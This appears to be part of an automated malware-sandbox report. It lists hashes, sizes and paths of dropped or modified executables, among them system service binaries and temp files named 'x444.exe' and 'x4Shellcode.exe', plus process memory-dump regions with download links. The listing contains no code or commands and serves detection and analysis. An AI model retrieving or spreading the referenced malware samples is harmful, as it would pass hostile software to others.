MD5
c7f296ebb196af1f97d7269c6f57fc93

SHA1
ab6559a879523c3bcda90b8ff70a4fa6804fd721

SHA256
5b524dcdec713b04db6b76fdf9c9b034cdc040acbb481edce54829896a9394b5

SHA512
74a1729b3b4440cf443b5580f001c2a4a401ea08bd6034a6c8fdd0ad36881cb37c4fb8f6afb649b080bf30cb73f642c51ec28841c4eb0c8285bc82a13855af37

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
781KB

MD5
99222d3fa0afb638453b0c8f7479c115

SHA1
26d25c8cd68676bc135cbd7918aef4639150b970

SHA256
f491a41f040a11882fce869e3b6ff36eb2c8607b7cdfe1a35d9c3488d4854681

SHA512
3f4ae238281c4e3814517effa4a1a5a46350c7399edb46ffa9df4b8e9c66bb1236ccaf65753305eec89120ec5b80e91077813fa9249888eab43e915d0e07b45d

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

Filesize
2.1MB

MD5
6145a85bc74d7c18f9a226b1b0590c4a

SHA1
1a901a2fd78f3bb9a123fa346c121f3415db0ce3

SHA256
962ceb7168a7977e1fa9d5852ea749dcb131cf52e06e945808a89373876610c5

SHA512
b8c282fbff7ba858eb62c0f819601b203973b08be31483c7cc56292b1a0eaeb984796179e4ebcd96efe0e02af4d5e81f7ebea6cefe63fefe7c39c089200f60a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\x444.exe

Filesize
68KB

MD5
4ecf266c6f6b637370ad59ba3a49bc62

SHA1
9a25b7093891c031e2764bf5e2fc97bb058d3b5a

SHA256
d62efe4f2e5c2c65fd7cf85cb8b865538becc3c8fa41c19f4c1bb9aa538bd428

SHA512
7310a4b8952f57fa15cd1969475b953a740570e5c875b9c5ab3f40a86f6abc1008bb1dc313508c4ad7d55a45ef800f3d2a94ed58f71db1a5732339440177ad8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

Filesize
731KB

MD5
851be4e85b0f111883680e87099483a3

SHA1
155e19ad0d2ec4bef3ba25512b6e8bc403350ec9

SHA256
ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197

SHA512
bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

Filesize
603KB

MD5
5c850f94e9d9a00b22bbed78870c107a

SHA1
0890438544c5f487ce33840feac422902b71ffd9

SHA256
a48a45d8c45fae5e9ec7db6945257409d5a9c5ef82d2970a565c5588410febc1

SHA512
a36d468af3b47965e06d0d0617ed0a50b2f355112940677d38a51adae8cbf2353dc804f5089de96c35d575c47358bf535a158235949c933fca3d3b46e6ef738f

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

Filesize
678KB

MD5
27bd3e745bd08f9cb8258a595c82c10d

SHA1
57bd3df53feefd8668eb4a05910460b301d21940

SHA256
1e87c656d91fc7f531bf03b6dc3a4a5a5245c5fa8801d1f2c254169818711318

SHA512
da424c82304a1d3945b0190b476e93c4ba89b5e999c737e1496866e83cca1f34560aa096f6cb84ff1e997b939589c056c26be6ed01c14f15bae6b0ad13522fd2

Download Submit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

Filesize
656KB

MD5
0b64702dc43e73a757f0339502ba623a

SHA1
651a75653572426d2fac60353001ec0b4efe8d95

SHA256
e5e034321120fdaa03858fbbe731e47075b01c487a94bfb3a5d214bc25825deb

SHA512
0daf7e97fd8150184f54b63ed52fe35f589c8e975fe5d195f01bf50473512ade654b860cc08ac2240473f2ab6964c4a53c58ce21c86e1bff79bcc339b95e8397

Download Submit
\Windows\System32\alg.exe

Filesize
644KB

MD5
fb0e6abc05ee023387c90acda26ae35e

SHA1
b83498a1633c4aa5521bdf05fefa5bca3243f2da

SHA256
177a940c868ff66b60127fc146b47b34bcb3d72e2551c8b01ec8dab51affe916

SHA512
fe797ac9347f4aaac1af6b1201803a66f09cb1cc49bcb540c1e412f19e8539aa62aa41fb7d6666f832d30a8892bfe31df1a98d58d0c7dd4ba333323e5b391fd0

Download Submit
memory/1292-433-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/1292-412-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/1572-175-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp

Filesize
9.9MB

Download
memory/1572-23-0x000007FEF55B3000-0x000007FEF55B4000-memory.dmp

Filesize
4KB

Download
memory/1572-10-0x0000000000AE0000-0x0000000000AF8000-memory.dmp

Filesize
96KB

Download
memory/1572-577-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp

Filesize
9.9MB

Download
memory/1636-72-0x0000000000210000-0x0000000000270000-memory.dmp

Filesize
384KB

Download
memory/1636-66-0x0000000000210000-0x0000000000270000-memory.dmp

Filesize
384KB

Download
memory/1636-74-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/1736-21-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp

Filesize
9.9MB

Download
memory/1736-0-0x000007FEF55B3000-0x000007FEF55B4000-memory.dmp

Filesize
4KB

Download
memory/1736-1-0x0000000000D50000-0x0000000000E14000-memory.dmp

Filesize
784KB

Download
memory/1780-404-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/1780-358-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/2036-449-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2036-465-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2040-18-0x0000000001FD0000-0x0000000002037000-memory.dmp

Filesize
412KB

Download
memory/2040-13-0x0000000001FD0000-0x0000000002037000-memory.dmp

Filesize
412KB

Download
memory/2040-22-0x0000000000400000-0x00000000004B9000-memory.dmp

Filesize
740KB

Download
memory/2056-28-0x0000000000850000-0x00000000008B0000-memory.dmp

Filesize
384KB

Download
memory/2056-27-0x0000000100000000-0x00000001000A4000-memory.dmp

Filesize
656KB

Download
memory/2056-353-0x0000000100000000-0x00000001000A4000-memory.dmp

Filesize
656KB

Download
memory/2056-34-0x0000000000850000-0x00000000008B0000-memory.dmp

Filesize
384KB

Download
memory/2160-135-0x0000000000AE0000-0x0000000000B0A000-memory.dmp

Filesize
168KB

Download
memory/2160-102-0x0000000000480000-0x0000000000488000-memory.dmp

Filesize
32KB

Download
memory/2160-101-0x000000001A0D0000-0x000000001A3B2000-memory.dmp

Filesize
2.9MB

Download
memory/2364-494-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2364-514-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2440-88-0x00000000001E0000-0x0000000000240000-memory.dmp

Filesize
384KB

Download
memory/2440-90-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/2440-82-0x00000000001E0000-0x0000000000240000-memory.dmp

Filesize
384KB

Download
memory/2440-492-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/2456-576-0x000000002E000000-0x000000002E0B5000-memory.dmp

Filesize
724KB

Download
memory/2456-126-0x000000002E000000-0x000000002E0B5000-memory.dmp

Filesize
724KB

Download
memory/2616-524-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2616-567-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2732-471-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2732-493-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2740-44-0x0000000000310000-0x0000000000370000-memory.dmp

Filesize
384KB

Download
memory/2740-405-0x0000000140000000-0x000000014009D000-memory.dmp

Filesize
628KB

Download
memory/2740-42-0x0000000140000000-0x000000014009D000-memory.dmp

Filesize
628KB

Download
memory/2740-50-0x0000000000310000-0x0000000000370000-memory.dmp

Filesize
384KB

Download
memory/2772-522-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/2772-100-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/2772-93-0x0000000000240000-0x00000000002A7000-memory.dmp

Filesize
412KB

Download
memory/2772-98-0x0000000000240000-0x00000000002A7000-memory.dmp

Filesize
412KB

Download
memory/2884-54-0x0000000000390000-0x00000000003F7000-memory.dmp

Filesize
412KB

Download
memory/2884-59-0x0000000000390000-0x00000000003F7000-memory.dmp

Filesize
412KB

Download
memory/2884-53-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2884-441-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2984-111-0x00000000008E0000-0x0000000000940000-memory.dmp

Filesize
384KB

Download
memory/2984-105-0x00000000008E0000-0x0000000000940000-memory.dmp

Filesize
384KB

Download
memory/2984-523-0x0000000140000000-0x00000001400CA000-memory.dmp

Filesize
808KB

Download
memory/2984-118-0x0000000140000000-0x00000001400CA000-memory.dmp

Filesize
808KB

Download